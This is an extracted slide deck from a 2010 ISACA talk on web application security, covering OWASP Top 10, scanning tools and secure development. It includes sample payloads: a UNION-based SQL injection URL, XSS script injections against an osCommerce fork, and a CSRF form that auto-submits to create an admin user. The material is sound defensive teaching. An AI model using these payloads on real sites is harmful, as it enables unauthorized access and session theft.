Securing Your Company s Web Presence

Size: px

Start display at page:

Download "Securing Your Company s Web Presence"

Clifton Henderson
6 years ago
Views:

1 Securing Your Company s Web Presence Russ McRee Microsoft Holisticinfosec.org Common security threats to your web presence & what you can do about it ISACA Puget Sound Meeting 3/16/2010

2 Securing your company s web presence AGENDA Understand the current state of security in the Web 2.0 world Common vulnerabilities and how easily hackers can exploit them Review common tools available for developers, auditors, managers, & security assessors Utilize frameworks (such as OWASP) to assess and prevent common vulnerabilities

3 State of the Web 2.0 Union 83% of websites have had at least one serious vulnerability 64% of websites currently have at least one serious vulnerability 61% vulnerability resolution-rate with 8,902 unresolved issues remaining (39%) Average # of serious severity unresolved vulnerabilities per website: 6.5 Source: WhiteHat Security

4 State of the Web 2.0 Union

5 State of the Web 2.0 Union Web malware Gumblar Gumblar is a botnet that infects Web servers and infected Web site visitors for the purposes of installing malcode on Personal Computers (PCs) that redirects end-user Google searches to fraudulent Web sites. Also looks for FTP credentials on the PC and may use them to compromise additional Web sites Malicious online advertisements Malicious advertisers purchase ad time in online streams or compromise existing aggregators Source: WhiteHat Security

6 Common vulns and ease of exploit Source: OWASP Top 10

7 Common vulns and ease of exploit 2010 CWE/SANS Top 25 Most Dangerous Programming Errors

8 Common vulns and ease of exploit Injection SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data. Source: OWASP Top 10

9 Common vulns and ease of exploit SQL injection Good: hp?id=2 Not good at all: hp?id=-1 union select base()),3,4,5,6,7,8,9,10,11 User = FBAR_FB002 Host private IP = MySQL version = Database = FBAR_WWW

10 Common vulns and ease of exploit SQL injection video demo festivalbar.it.msn.com

Common vulns and ease of exploit Cross-site scripting (XSS) XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and

11 Common vulns and ease of exploit Cross-site scripting (XSS) XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping XSS allows attackers to execute script in the victim s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites Source: OWASP Top 10

12 Common vulns and ease of exploit Cross-site scripting (XSS) Good Bad b/catalog/advanced_search_result.php?keyw ords=hdmi81b604491e b/catalog/advanced_search_result.php?keyw ords=hdmi81b60<script>alert(document.cookie)</ script>4491e Really bad b/catalog/advanced_search_result.php?keyw ords=hdmi81b60<script src= 4491e163632

13 Common vulns and ease of exploit XSS video demo eclime 1.0.9b (oscommerce fork)

Common vulns and ease of exploit Source: OWASP Top 10 Cross-site request forgery (CSRF) A CSRF attack forces a logged-on victim s browser to send a forged HTTP request, including the victim s session

14 Common vulns and ease of exploit Source: OWASP Top 10 Cross-site request forgery (CSRF) A CSRF attack forces a logged-on victim s browser to send a forged HTTP request, including the victim s session cookie and any other authentication information, to a vulnerable web application This allows the attacker to force the victim s browser to generate requests the vulnerable application thinks are legitimate requests from the victim

15 Common vulns and ease of exploit Cross-site request forgery <html> <form name="createid" action=" rators.php?action=insert" method=post AUTOCOMPLETE="off"> <input type="hidden" name="username" value="frank"> <input type="hidden" name="password" value="test"> <input type="hidden" name="x" value=""> <input type="hidden" name="y" value=""> </form> <script> window.settimeout(function() { document.createid.submit(); }, 3000); </script> <h1>adding an oscommerce admin user...</h1> </html>

16 Common vulns and ease of exploit CSRF video demo oscommerce

17 Common tools commercial Acunetix WVS by Acunetix AppScan by IBM Burp Suite Professional by PortSwigger Hailstorm by Cenzic MileScan Web Security Auditor by MileSCAN Technologies N-Stalker by N-Stalker NetSparker by Mavituna Security NeXpose by Rapid7 NTOSpider by NTObjectives Retina Web Security Scanner by eeye Digital Security SecurityQA Toolbar by isec Partners WebApp360 by ncircle WebInspect by HP Tools I ve used Source: WASC Scanner List

18 Common tools - Saas AppScan OnDemand by IBM ClickToSecure by Cenzic QualysGuard Web Application Scanning by Qualys Sentinel by WhiteHat Veracode Web Application Security by Veracode WebInspect by HP Tools I ve used Source: WASC Scanner List

19 Common tools Free/Open Source Burp Suite by PortSwigger Grabber by Romain Gaucher Grendel-Scan by David Byrne and Eric Duprey Nikto/Wikto Paros by Chinotec Powerfuzzer by Marcin Kozlowski SecurityQA Toolbar by isec Partners TamperData W3AF by Andres Riancho Wapiti by Nicolas Surribas Watcher & Fiddler Tools I ve used Source: WASC Scanner List

20 Tools Burp & Tamper Data Burp or Tamper Data demo

21 Frameworks Audit against OWASP Top 10 and CWE/SANS Top 25 Now balance that those against compliance requirements You re the auditors, you tell me ;-) PCI HIPAA SOX GLBA

22 Frameworks Security Development Lifecycle (SDL) Incorporates comprehensive security and privacy protections for online services and Web applications. Includes requirements that address widely exploited classes of Web vulnerabilities, including XSS, SQL injection, and CSRF among others. Applies to large, medium and small organizations Applies to various development methodologies Applies to any platform

23 Frameworks SDL Threat Modeling Classic software threat modeling Infrastructure threat modeling

24 Resources OWASP Top 10 WASP_Top_Ten_Project 2010 CWE/SANS Top 25 Most Dangerous Programming Errors 8 th WhiteHat Website Security Statistic Report whitehat-security-8th-website-securitystatistics-report

25 Resources SDL aspx Infrastructure Threat Modeling SDL Threat Modeling Tool aspx?familyid=a48cccb1-814b-47b6-9d17-1e273f65ae19&displaylang=en Toolsmith

26 Resources WebGoat WASP_WebGoat_Project

27 Russ McRee russ at holisticinfosec dot org rmcree at microsoft dot com QUESTIONS? ISACA Puget Sound Meeting 3/16/2010

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing Advancing Expertise in Security Testing Taming the Wild West Canberra, Australia 1 Who is this guy? Andrew